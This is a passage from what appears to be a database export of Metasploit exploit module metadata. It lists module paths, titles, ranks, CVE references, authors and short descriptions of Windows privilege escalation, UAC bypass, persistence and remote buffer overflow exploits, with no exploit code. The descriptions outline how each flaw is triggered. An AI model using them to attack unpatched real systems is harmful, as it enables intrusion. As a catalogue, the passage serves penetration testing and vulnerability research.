Buffer Overflow Adobe Reader X Sandbox Bypass",500,"This module exploits a vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing to achieve Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-05-14 00:00:00",0,,"aggressive","t","CVE-2013-2730, OSVDB-93355, URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html","Felipe Andres Manzano, juan vazquez " 901,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/always_install_elevated.rb","exploit","windows/local/always_install_elevated","exploit/windows/local/always_install_elevated","Windows AlwaysInstallElevated MSI",200,"This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/exploits/exec_payload.msi with the WiX source file under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply executes payload.exe within the same folder. The MSI may not execute succesfully successive times, but may be able to get around this by regenerating the MSI. MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs light exec_payload.wixobj","Metasploit Framework License (BSD)","f","2010-03-18 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx, URL-http://wix.sourceforge.net, URL-http://www.greyhathacker.net/?p=185","Ben Campbell, Parvez Anwar" 902,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/ask.rb","exploit","windows/local/ask","exploit/windows/local/ask","Windows Escalate UAC Execute RunAs",600,"This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.","Metasploit Framework License (BSD)","f","2012-01-03 00:00:00",0,,"aggressive","t","URL-http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html","mubix " 903,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/bypassuac.rb","exploit","windows/local/bypassuac","exploit/windows/local/bypassuac","Windows Escalate UAC Protection Bypass",600,"This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.","Metasploit Framework License (BSD)","f","2010-12-31 00:00:00",0,,"aggressive","t","URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/","David Kennedy ""ReL1K"" , mitnick, mubix " 904,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/current_user_psexec.rb","exploit","windows/local/current_user_psexec","exploit/windows/local/current_user_psexec","PsExec via Current User Token",600,"This module uploads an executable file to the victim system, creates a share containing that executable, creates a remote service on each target system using a UNC path to that file, and finally starts the service(s). The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash.","Metasploit Framework License (BSD)","f","1999-01-01 00:00:00",0,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx","egypt , jabra" 905,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/ms10_092_schelevator.rb","exploit","windows/local/ms10_092_schelevator","exploit/windows/local/ms10_092_schelevator","Windows Escalate Task Scheduler XML Privilege Escalation",600,"This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.","Metasploit Framework License (BSD)","f","2010-09-13 00:00:00",0,,"aggressive","t","BID-44357, CVE-2010-3338, EDB-15589, MSB-MS10-092, OSVDB-68518","jduck " 906,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb","exploit","windows/local/ms11_080_afdjoinleaf","exploit/windows/local/ms11_080_afdjoinleaf","MS11-080 AfdJoinLeaf Privilege Escalation",200,"This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability.","Metasploit Framework License (BSD)","f","2011-11-30 00:00:00",0,,"aggressive","t","CVE-2011-2005, EDB-18176, MSB-MS11-080, URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/","Matteo Memelli, Spencer McIntyre" 907,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/payload_inject.rb","exploit","windows/local/payload_inject","exploit/windows/local/payload_inject","Windows Manage Memory Payload Injection",600,"This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.","Metasploit Framework License (BSD)","f","2011-10-12 00:00:00",0,,"aggressive","t",,"Carlos Perez , sinn3r " 908,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/persistence.rb","exploit","windows/local/persistence","exploit/windows/local/persistence","Windows Manage Persistent Payload Installer",600,"This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method.","Metasploit Framework License (BSD)","f","2011-10-19 00:00:00",0,,"aggressive","t",,"Carlos Perez " 909,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/s4u_persistence.rb","exploit","windows/local/s4u_persistence","exploit/windows/local/s4u_persistence","Windows Manage User Level Persistent Payload Installer",600,"Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight).","Metasploit Framework License (BSD)","f","2013-01-02 00:00:00",0,,"aggressive","t","URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/, URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/","Brandon McCann ""zeknox"" , Thomas McCarthy ""smilingraccoon"" " 910,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/service_permissions.rb","exploit","windows/local/service_permissions","exploit/windows/local/service_permissions","Windows Escalate Service Permissions Local Privilege Escalation",500,"This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.","Metasploit Framework License (BSD)","f","2012-10-15 00:00:00",0,,"aggressive","t",,"scriptjunkie" 911,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/trusted_service_path.rb","exploit","windows/local/trusted_service_path","exploit/windows/local/trusted_service_path","Windows Service Trusted Path Privilege Escalation",600,"This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section ""Calling Processes Security"" on page 676.","Metasploit Framework License (BSD)","f","2001-10-25 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx, URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us","sinn3r " 912,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/domino_http_accept_language.rb","exploit","windows/lotus/domino_http_accept_language","exploit/windows/lotus/domino_http_accept_language","IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes.","Metasploit Framework License (BSD)","t","2008-05-20 00:00:00",,,"aggressive","t","BID-29310, CVE-2008-2240, OSVDB-45415, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057","Earl Marcus klks , Fairuzan Roslan " 913,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/domino_icalendar_organizer.rb","exploit","windows/lotus/domino_icalendar_organizer","exploit/windows/lotus/domino_icalendar_organizer","IBM Lotus Domino iCalendar MAILTO Buffer Overflow",300,"This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By sending a long string of data as the ""ORGANIZER;mailto"" header, process ""nRouter.exe"" crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to gain arbitrary code execution. Note: In order to trigger the vulnerable code path, a valid Domino mailbox account is needed.","Metasploit Framework License (BSD)","f","2010-09-14 00:00:00",2,,"aggressive","t","CVE-2010-3407, OSVDB-68040, URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/, URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-177/","A. Plaskett, sinn3r " 914,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/domino_sametime_stmux.rb","exploit","windows/lotus/domino_sametime_stmux","exploit/windows/lotus/domino_sametime_stmux","IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in Lotus Domino\'s Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez.","Metasploit Framework License (BSD)","t","2008-05-21 00:00:00",1,,"aggressive","t","BID-29328, CVE-2008-2499, OSVDB-45610, URL-http://www.zerodayinitiative.com/advisories/ZDI-08-028/","patrick , riaf " 915,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/lotusnotes_lzh.rb","exploit","windows/lotus/lotusnotes_lzh","exploit/windows/lotus/lotusnotes_lzh","Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",300,"This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net","Metasploit Framework License (BSD)","f","2011-05-24 00:00:00",0,,"passive","t","BID-48018, CVE-2011-1213, OSVDB-72706, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904, URL-http://www.ibm.com/support/docview.wss?uid=swg21500034","alino <26alino@gmail.com>, binaryhouse.net" 916,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/hummingbird_exceed.rb","exploit","windows/lpd/hummingbird_exceed","exploit/windows/lpd/hummingbird_exceed","Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",200,"This module exploits a stack buffer overflow in Hummingbird Connectivity 10 LPD Daemon. This module has only been tested against Hummingbird Exceed v10 with SP5.","Metasploit Framework License (BSD)","t","2005-05-27 00:00:00",,,"aggressive","t","BID-13788, CVE-2005-1815, OSVDB-16957","MC " 917,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/niprint.rb","exploit","windows/lpd/niprint","exploit/windows/lpd/niprint","NIPrint LPD Request Overflow",400,"This module exploits a stack buffer overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-)","Metasploit Framework License (BSD)","f","2003-11-05 00:00:00",0,,"aggressive","t","BID-8968, CVE-2003-1141, OSVDB-2774, URL-http://www.immunitysec.com/documentation/vs_niprint.html","hdm " 918,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/saplpd.rb","exploit","windows/lpd/saplpd","exploit/windows/lpd/saplpd","SAP SAPLPD 6.28 Buffer Overflow",400,"This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) . By sending an overly long argument, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-02-04 00:00:00",0,,"aggressive","t","BID-27613, CVE-2008-0621, OSVDB-41127","MC " 919,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/wincomlpd_admin.rb","exploit","windows/lpd/wincomlpd_admin","exploit/windows/lpd/wincomlpd_admin","WinComLPD <= 3.0.2 Buffer Overflow",400,"This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote adminstration service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-02-04 00:00:00",0,,"aggressive","t","BID-27614, CVE-2008-5159, OSVDB-42861","MC " 920,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/actfax_raw_server_bof.rb","exploit","windows/misc/actfax_raw_server_bof","exploit/windows/misc/actfax_raw_server_bof","ActFax 5.01 RAW Server Buffer Overflow",300,"This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW Server can be used to transfer fax messages without any underlying protocols. To note significant fields in the fax being transferred, like the fax number or the recipient, ActFax data fields can be used. This module exploits a buffer overflow in the handling of the @F506 fields due to the insecure usage of strcpy. This module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).","Metasploit Framework License (BSD)","f","2013-02-05 00:00:00",0,,"aggressive","t","BID-57789, EDB-24467, OSVDB-89944, URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html","Craig Freyman, corelanc0d3r, juan vazquez " 921,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/agentxpp_receive_agentx.rb","exploit","windows/misc/agentxpp_receive_agentx","exploit/windows/misc/agentxpp_receive_agentx","AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",400,"This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This module was tested successfully against master.exe as included with Real Network\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This module does not work with NX/XD enabled but could be modified easily to do so. The address","Metasploit Framework License (BSD)","t","2010-04-16 00:00:00",0,,"aggressive","t","CVE-2010-1318, OSVDB-63919, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867","jduck " 922,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/allmediaserver_bof.rb","exploit","windows/misc/allmediaserver_bof","exploit/windows/misc/allmediaserver_bof","ALLMediaServer 0.8 Buffer Overflow",300,"This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.","Metasploit Framework License (BSD)","f","2012-07-04 00:00:00",1,,"aggressive","t","EDB-19625","juan vazquez , modpr0be , motaz reda " 923,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb","exploit","windows/misc/apple_quicktime_rtsp_response","exploit/windows/misc/apple_quicktime_rtsp_response","Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",300,"This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long RTSP response to a client, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-11-23 00:00:00",0,,"passive","t","BID-26549, CVE-2007-6166, EDB-4648, OSVDB-40876","MC " 924,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb","exploit","windows/misc/asus_dpcproxy_overflow","exploit/windows/misc/asus_dpcproxy_overflow","Asus Dpcproxy Buffer Overflow",200,"This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19. It should be vulnerable until version 2.0.0.24. Credit to Luigi Auriemma","Metasploit Framework License (BSD)","t","2008-03-21 00:00:00",0,,"aggressive","t","BID-28394, CVE-2008-1491, OSVDB-43638","Jacopo Cervini" 925,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb","exploit","windows/misc/avaya_winpmd_unihostrouter","exploit/windows/misc/avaya_winpmd_unihostrouter","Avaya WinPMD UniteHostRouter Buffer Overflow",300,"This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability exists in the UniteHostRouter service, due to the insecure usage of memcpy when parsing specially crafted ""To:"" headers. The module has been tested successfully on Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2011-05-23 00:00:00",0,,"aggressive","t","BID-47947, EDB-18397, OSVDB-73269, OSVDB-82764, URL-http://secunia.com/advisories/44062, URL-https://downloads.avaya.com/css/P8/documents/100140122","Abdul-Aziz Hariri, Abysssec, juan vazquez " 926,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/avidphoneticindexer.rb","exploit","windows/misc/avidphoneticindexer","exploit/windows/misc/avidphoneticindexer","Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow",300,"This module exploits a stack buffer overflow in process AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer 5.5 Editing Suite. This daemon sometimes starts on a different port; if you start it standalone it will run on port 4660.","Metasploit Framework License (BSD)","f","2011-11-29 00:00:00",0,,"aggressive","t","CVE-2011-5003, OSVDB-77376, URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf","vt [nick.freeman " 927,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bakbone_netvault_heap.rb","exploit","windows/misc/bakbone_netvault_heap","exploit/windows/misc/bakbone_netvault_heap","BakBone NetVault Remote Heap Overflow",200,"This module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee.","Metasploit Framework License (BSD)","f","2005-04-01 00:00:00",,,"aggressive","t","BID-12967, CVE-2005-1009, OSVDB-15234","hdm , nolimit.bugtraq " 928,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bcaaa_bof.rb","exploit","windows/misc/bcaaa_bof","exploit/windows/misc/bcaaa_bof","Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",400,"This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102), which comes as part of the Blue Coat Authentication proxy. Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution (in some cases, it takes as many as five times). This can cause your activity to look even more suspicious. To modify the number of exploit attempts, set the ATTEMPTS option.","Metasploit Framework License (BSD)","f","2011-04-04 00:00:00",0,,"aggressive","t","CVE-2011-5124, OSVDB-72095, URL-http://seclists.org/bugtraq/2011/Jul/44, URL-https://kb.bluecoat.com/index?page=content&id=SA55","Paul Harrington, Travis Warren, sinn3r " 929,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server.rb","exploit","windows/misc/bigant_server","exploit/windows/misc/bigant_server","BigAnt Server 2.2 Buffer Overflow",200,"This module exploits a stack buffer overflow in BigAnt Server 2.2. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-04-15 00:00:00",0,,"aggressive","t","BID-28795, CVE-2008-1914, OSVDB-44454","MC " 930,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_250.rb","exploit","windows/misc/bigant_server_250","exploit/windows/misc/bigant_server_250","BigAnt Server 2.50 SP1 Buffer Overflow",500,"This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.50 SP1.","Metasploit Framework License (BSD)","t","2008-04-15 00:00:00",0,,"aggressive","t","CVE-2008-1914, EDB-9673, EDB-9690, OSVDB-44454","Dr_IDE " 931,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_dupf_upload.rb","exploit","windows/misc/bigant_server_dupf_upload","exploit/windows/misc/bigant_server_dupf_upload","BigAnt Server DUPF Command Arbitrary File Upload",600,"This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. A lack of authentication allows to make unauthenticated file uploads through a DUPF command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2.","Metasploit Framework License (BSD)","t","2013-01-09 00:00:00",0,,"aggressive","t","BID-57214, CVE-2012-6274, OSVDB-89342, US-CERT-VU-990652","Hamburgers Maccoy, juan vazquez " 932,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb","exploit","windows/misc/bigant_server_sch_dupf_bof","exploit/windows/misc/bigant_server_sch_dupf_bof","BigAnt Server 2 SCH And DUPF Buffer Overflow",300,"This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This module uses a combination of SCH and DUPF request to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2013-01-09 00:00:00",0,,"aggressive","t","BID-57214, CVE-2012-6275, OSVDB-89344, US-CERT-VU-990652","Hamburgers Maccoy, juan vazquez " 933,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_usv.rb","exploit","windows/misc/bigant_server_usv","exploit/windows/misc/bigant_server_usv","BigAnt Server 2.52 USV Buffer Overflow",500,"This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.","Metasploit Framework License (BSD)","t","2009-12-29 00:00:00",0,,"aggressive","t","EDB-10765, EDB-10973, OSVDB-61386","DouBle_Zer0, Lincoln, jduck " 934,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bomberclone_overflow.rb","exploit","windows/misc/bomberclone_overflow","exploit/windows/misc/bomberclone_overflow","Bomberclone 0.11.6 Buffer Overflow",200,"This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with lstrcpyA memory address, the second and third value are the destination buffer, the fourth value is the source address of our buffer in the stack. This exploit is like a return in libc. ATTENTION The shellcode is exec ONLY when someone try to close bomberclone.","Metasploit Framework License (BSD)","f","2006-02-16 00:00:00",,,"aggressive","t","BID-16697, CVE-2006-0460, OSVDB-23263, URL-http://www.frsirt.com/english/advisories/2006/0643","Jacopo Cervini " 935,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bopup_comm.rb","exploit","windows/misc/bopup_comm","exploit/windows/misc/bopup_comm","Bopup Communications Server Buffer Overflow",400,"This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-06-18 00:00:00",0,,"aggressive","t","CVE-2009-2227, EDB-9002, OSVDB-55275, URL-http://www.blabsoft.com/products/server","MC " 936,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/borland_interbase.rb","exploit","windows/misc/borland_interbase","exploit/windows/misc/borland_interbase","Borland Interbase Create-Request Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland Interbase 2007. By sending a specially crafted create-request packet, a remote attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-07-24 00:00:00",0,,"aggressive","t","CVE-2007-3566, OSVDB-38602, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13","MC " 937,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/borland_starteam.rb","exploit","windows/misc/borland_starteam","exploit/windows/misc/borland_starteam","Borland CaliberRM StarTeam Multicast Service Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending a specially crafted GET request to the STMulticastService, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-04-02 00:00:00",0,,"aggressive","t","BID-28602, CVE-2008-0311, OSVDB-44039","MC " 938,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess.rb","exploit","windows/misc/citrix_streamprocess","exploit/windows/misc/citrix_streamprocess","Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",400,"This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6. By sending a specially crafted packet to the Provisioning Services server, a fixed length buffer on the stack can be overflowed and arbitrary code can be executed.","Metasploit Framework License (BSD)","t","2011-01-20 00:00:00",0,,"aggressive","t","OSVDB-70597, URL-http://secunia.com/advisories/42954/, URL-http://support.citrix.com/article/CTX127149, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-023/","mog" 939,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb","exploit","windows/misc/citrix_streamprocess_data_msg","exploit/windows/misc/citrix_streamprocess_data_msg","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, Windows 7, and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-009","AbdulAziz Hariri, alino <26alino@gmail.com>" 940,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb","exploit","windows/misc/citrix_streamprocess_get_boot_record_request","exploit/windows/misc/citrix_streamprocess_get_boot_record_request","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. The module, which allows code execution under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2 and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846","alino <26alino@gmail.com>, juan vazquez " 941,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb","exploit","windows/misc/citrix_streamprocess_get_footer","exploit/windows/misc/citrix_streamprocess_get_footer","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode 0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2 and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846","alino <26alino@gmail.com>, juan vazquez " 942,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb","exploit","windows/misc/citrix_streamprocess_get_objects","exploit/windows/misc/citrix_streamprocess_get_objects","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode 0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2 and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-010/","Anyway , alino <26alino@gmail.com>, juan vazquez " 943,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/doubletake.rb","exploit","windows/misc/doubletake","exploit/windows/misc/doubletake","DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",200,"This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs.","Metasploit Framework License (BSD)","f","2008-06-04 00:00:00",0,,"aggressive","t","CVE-2008-1661, OSVDB-45924","ri0t " 944,"2013-05-07 